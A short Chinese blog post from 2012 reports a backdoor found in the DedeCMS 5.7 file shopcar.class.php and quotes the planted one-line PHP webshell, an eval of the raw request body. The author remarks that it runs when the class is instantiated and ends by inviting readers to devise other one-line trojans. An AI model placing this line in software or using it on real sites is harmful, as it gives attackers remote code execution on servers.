网络安全

DEDE5.7 爆出后门

作者:admin 日期:2012-04-25

字体大小:

 汗,dede5.7版本竟然被搞了个后门出来,不知道是不是真的,好像很多人都在说这个事!

是说

 

shopcar.class.php 被植入一句话
 
@eval(file_get_contents(''php://input''));
 
呵呵,确实是被植入了一句话,不过这句话是在构造函数里面的,要被实例化的时候才能被执行!
 
网上exp有了,我就不发了!不过从这个里面我们可以学到一些东西嘛,其实一句话木马的写法还是很多的嘛,不妨再给点创意?

 



文章来自: 本站原创
Tags:
评论: 0 | 查看次数: 9240